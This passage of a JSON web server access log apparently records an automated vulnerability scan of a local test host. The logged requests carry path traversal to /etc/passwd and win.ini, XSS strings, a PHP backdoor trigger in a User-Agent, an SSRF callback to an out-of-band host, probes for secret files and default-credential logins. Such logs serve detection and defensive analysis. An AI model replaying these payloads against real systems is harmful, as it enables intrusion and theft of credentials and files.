x00\x00\x00\x1B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFv\x04\x00\x00META-INF/maven/org.example/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFF\xAF\x04\x00\x00META-INF/maven/org.example/eviljar/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xF0\x04\x00\x00META-INF/maven/org.example/eviljar/pom.xmlPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81N\x06\x00\x00META-INF/maven/org.example/eviljar/pom.propertiesPK\x05\x06\x00\x00\x00\x00\x08\x00\x08\x00?\x02\x00\x00\x10\x07\x00\x00\x00\x00\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22request\x22; filename=\x22blob\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0Anull\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/add HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET \x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationserverservlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/products HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"SAMLResponse=%22%3E%3Csvg/onload=alert(/29KD1w5zhTMZsVNkFb3tseY6a6q/)%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"http:","request":"POST /auth/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/lists.asmx?WSDL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /check_mk/login.py HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"{\x22entry\x22:\x22Evil\x22,\x22request\x22:\x22id\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/customMethod HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http/.....///.....///config/config_db.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all_dbs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/upload/web-ftp.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cpqlogin.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeConfigs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /node_modules/../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?action=register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config-backup.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordpress-popup/views/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=.....///http/.....///config/config_db.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?qtproxycall=http://ca28fg0smpvbd3qg07h0j4mn4peuy34zm.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download?type=files&filename=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/email-subscribers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeViews HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/privatekey.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?29KD24F8c1m5QHYG1vdjYYNPTKD=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"cache.example.com"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"zerodiumvar_dump(233*233);", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?login=lutron&password=lutron HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 